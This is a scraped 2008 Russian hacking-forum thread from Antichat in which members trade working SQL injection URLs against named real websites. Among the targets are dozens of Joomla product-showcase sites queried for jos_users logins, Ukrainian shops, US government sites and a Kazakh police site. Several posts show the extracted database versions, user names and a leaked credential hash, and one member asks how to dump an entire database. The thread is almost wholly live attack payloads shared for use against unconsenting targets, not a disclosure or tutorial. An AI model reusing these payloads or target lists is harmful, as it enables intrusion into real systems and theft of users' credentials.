Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.03.2008, 22:10
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 ThreeD
Сомневаюсь, что это �B��� можно использовать в качестве логина 
Вот столбцы из таблицы admin:
UID
DEPARTMENT
DEPARTMENT_UID
ID
PWD
NAME
SEX
MOBILE
EMAIL
PRIVILEGE
LAST_LOGIN
LAST_CHPWD
Я админку не искал,но думаю для авторизации используют не имя на японском |
|
|
15.03.2008, 23:27
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Чтоб в тему:
http://www.attcottonbowl.com/news_room/releases.php?uid=-160'+union+select+1,2,3,4,5,concat_ws(0x3A3a,versi on(),database(),user()),7,8,9,10,11,12,13,14,15,16 +from+user/*
4.1.20::cottonbowl::cottonbowl@localhost
В таблице user поля подобрать не смог (
|
|
|
|
16.03.2008, 00:14
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Код:
http://mirfurniture.ru/ind.php?id_typ=0x3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
5.0.33-log/dmebel6/root@localhost
Код:
http://www.9528033.ru/board/ind.php?id_typ=0x2d3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
4.1.22/www9528033ru/f9528033@localhost
Код:
http://neodoska.ru/ind.php?id_categ=0x2d3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20/*
5.0.45-community/angelos_doska/angelos@localhost
Готовые  их там еще тысячи в ГУГЛЕ =)
Код:
http://www.ridgecrestdevelopments.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.regencycollege.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.rogerssprayers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.lifelinebrokers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.shaughnessyappliance.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.dembytrailer.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.neufeldbuildingmovers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.kwpetro.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.hubcity150.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.greatwestwarehouse.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.saskatoonbeds.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest12.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.efficiencyheating.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest11.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.imatroncontinental.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.minitune.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.ceresindustries.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.saskatoonbeds.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest3.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.sewandhome.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest4.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.lifelinebrokers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.wildrosegarments.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.efficiencyheating.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.dembytrailer.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.virgorenovation.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.olympicpavingstone.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.firsteditionfirstaid.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.ironmax.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest18.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest19.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest16.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.peak-mechanical.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.taylorgroupofcompanies.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.goldentouchcarpet.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest13.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.firsteditionfirstaid.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.dixondevelopment.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.olympicpavingstone.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.saskatoonprosign.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.goldentouchcarpet.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.highwayagencies.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.chinese.regencycollege.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
Сообщение от ThreeD
Чтоб в тему:
http://www.attcottonbowl.com/news_room/releases.php?uid=-160'+union+select+1,2,3,4,5,concat_ws(0x3A3a,versi on(),database(),user()),7,8,9,10,11,12,13,14,15,16 +from+user/*
4.1.20::cottonbowl::cottonbowl@localhost
В таблице user поля подобрать не смог (
БОЯН, блин че вам лень посмореть в АНТИБОЯН ???!!!! |
|
|
|
16.03.2008, 06:36
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Код:
http://www.dok-4.ru/?id=-9+union+select+1,user(),3,4,5,version()/*
|
|
|
|
16.03.2008, 08:09
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
Вот решил сегодня пройтись по besthosting.in.ua
Ну вот результат
Тут все что угодно
и магазины и инфо службы
http://zapodarkami.kiev.ua/pages.php?page=-9+union+select+1,2,3,concat_ws(char(58),TABLE_NAME ,COLUMN_NAME)+from+INFORMATION_SCHEMA.COLUMNS+limi t+190/*
http://www.goldshop.kiev.ua/kat.php?kat=-8+union+select+1,user()/*--
http://avenue.rielt.org/real-estates.php?m=-3+union+select+1,2,3,4,5,6,7,8,user(),10/*
http://ceramica.com.ua/cat2.php?ven=-14++union+select+1,concat_ws(char(58),TABLE_SCHEMA ,TABLE_NAME,COLUMN_NAME),3+from+INFORMATION_SCHEMA .COLUMNS+limit+600/*
http://style9999.kiev.ua/all.php?tov_id=-2953+union+select+1,concat_ws(char(58),TABLE_SCHEM A,TABLE_NAME,COLUMN_NAME,0x3a),3,4,5,6,7,8,9,10,11 ,12+from+INFORMATION_SCHEMA.COLUMNS+limit+1+offset +210/*
http://www.betta.ua/?pageid=-274+union+select+concat_ws(char(58),TABLE_SCHEMA,T ABLE_NAME,COLUMN_NAME)+from+INFORMATION_SCHEMA.COL UMNS+limit+1+offset+210/*
http://ukr-links.kiev.ua/section.php?kat=3&subkat=-28%20union%20select%201,2,3,4,5,concat_ws(char(58) ,id,kat%20,subkat,url,name,info,keywords,status,da te,date2,iphost,view,user,email,nashbutton,ocenka, tmp2%20),7,8,9,10,11,12,13,14,15,16,17%20from%20uk rlinks_baze.site%20limit%209999/*&page=264
http://www.udrua.com/cat2.php?id=-723+union+select+concat_ws(char(58),TABLE_SCHEMA,T ABLE_NAME,COLUMN_NAME),2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20+from+INFORMATION_SCHEMA.COLU MNS+limit+1+offset+310/*
http://www.uakiev.info/section.php?kat=9&subkat=-83+union+select+1,2,3,concat_ws(char(58),TABLE_SCH EMA,TABLE_NAME,COLUMN_NAME),5,6,7,8,9,10,11,12+fro m+INFORMATION_SCHEMA.COLUMNS+limit+1900/*
http://www.webinfo.kiev.ua/kat.php?kat=-6+union+select+1,2,3,4,concat_ws(char(58),TABLE_SC HEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13+f rom+INFORMATION_SCHEMA.COLUMNS+limit+175,1900/*
http://www.webkatalog.kiev.ua/section.php?kat=9&subkat=-79%20union%20select%201,2,3,4,5,concat_ws(char(58) ,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),7,8,9,10,11, 12,13,14,15,16,17%20from%20INFORMATION_SCHEMA.COLU MNS%20limit%20175,190000/*&page=4
кто захочет сам посмотрит
Последний раз редактировалось neon_fx; 16.03.2008 в 09:38..
|
|
|
|
16.03.2008, 09:47
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Код:
http://www.worldstart.com/tips/tips.php/1862/**/and/**/ascii(lower(substring(version(),1,1)))=0x33/*
Тройка  (( жесть |
|
|
|
16.03.2008, 12:44
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Нашел сначала пассивную xss, но мне показалось что ресурс содержит еще баги, начал ковырять, в итоге :
Информация о ресурсе смотреть
Код:
http://www.ukrindustrial.com/job/?fuseaction=job_employer.viewVacancy&jvr_id=-11029+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,email,pass),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+limit+2,10--
Последний раз редактировалось xcedz; 16.03.2008 в 12:54..
Причина: удачи ;)
|
|
|
|
16.03.2008, 16:42
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Кому govHA?)
Кому govHA?)
http://www.dot.ca.gov
Код:
http://www.dot.ca.gov/dist07/travel/projects/?pib=det&id=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
4.0.18-standard-log/d7mediapr/d7media_user@www1.dot.ca.gov |
|
|
|
16.03.2008, 19:13
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Опять я вам принес govHA =)
http://prairieviewtexas.gov
Код:
http://prairieviewtexas.gov/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7/*
5.0.45-community-nt/cpv/cpv@localhost
http://kostanaypolice.kz/ ну а это уже совсем) МВД Республики Казахстан
Код:
http://kostanaypolice.kz/index.php?id=0x2d3127)%20union+select+1,2,concat_ws(0x2F,version(),database(),user())/*
4.1.22-log/t314kz_dvd/t314kz_dvduser@localhost
Все за мной приехали
Не забывайте меня |
|
|
|
16.03.2008, 20:38
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
http://www.fdh.com/news/show.php?id=-52+union+select+1,concat_ws(char(58),user,password ),3,4,5+from+mysql.user+limit+0,10/*
fdhllp:4ee995d07a241a7b
http://www.falltvpreview.com/show.php?id=-134+union+select+1,2,3,4,concat_ws(char(58),TABLE_ SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26+from+INFOR MATION_SCHEMA.COLUMNS+limit+1--
И такой вопрос какой запрос прописать чтобы создать дамп БД на falltvpreview.com
ну и в первом случае тоже
http://www.airsoftgun.ee/rus/show.php?object=news&mode=full&id=-120+union+select+1,user(),3,Version(),5,6,7+from+I NFORMATION_SCHEMA.COLUMNS+limit+1/*
d10641sa15260@194.204.33.8
5.0.32-Debian_7etch1-log
Последний раз редактировалось neon_fx; 16.03.2008 в 21:48..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
